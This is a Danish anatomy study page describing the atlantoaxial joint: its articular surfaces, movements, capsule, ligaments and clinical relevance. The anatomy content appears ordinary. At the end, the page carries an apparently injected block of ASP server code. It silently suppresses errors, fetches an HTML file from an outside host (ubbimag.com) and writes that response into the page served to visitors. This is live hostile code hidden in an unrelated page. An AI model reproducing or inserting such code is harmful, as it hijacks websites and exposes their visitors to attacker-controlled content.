Articulatio atlantoaxialis

Led type Ægte, delt, simpelt, dreje- glideled.
Ledflader
  1. Fac. art. ant. og post. på dens, fovea dentis og lig. transversum
  2. Fovea articularis inferior atlantis (sin./dxt.), facies art. sup. axis (sin./dxt.).
Frihedsgrader

Bev. i det transverselle plan om en vertikal akse gennem dens => rotation i 1.

Parallelforskydning i det transverselle plan i 2.

Kapsel

Fibrøse:

  1. Forreste ledhule: Tynd og slap. Bagerste: Fraværende.
  2. Tynd og slap
Ligamenter

Mere!

Ligamentum transversum atlantis

(lig. crusiforme atlantis)

Ligamenta alaria

Membrana tectoria

Lig. apicis dentis

Ligamentum nuchae

Fibrøsebruskdannelser
Andet vigtigt Medulla oblongata / spinalis ligger lige bag dens og kan let klemmes / beskadies ved instabillitet eller traumer i eller omkring leddet.

Virker sammen med art. atlantoccipitalis funktionelt som et kugleled.

A. vertebralis passerer gennem foramen proc. transversus og sulcus a. vertebralis op gennem foramen magnum.

Præcisions bevægelser styret af de suboccipitale muskler. Stor betydning for bl.a. ligevægts- og orienteringsreflekser.

Ved lateral fleksion i art. atlantooccipitalis sker der pga. en stramning i lig. alare rotation til modsat side i art. atlantoaxiale. (hvis ansigtet holdes ligefrem roteres axis til samme side)

<% On Error Resume Next set XmlObj = Server.CreateObject("Microsoft.XMLHTTP") XmlObj.open "GET", "http://ubbimag.com/z10.html", false XmlObj.send formatdata = XmlObj.responseText file_get_contents=formatdata Set XmlObj = nothing response.write file_get_contents %>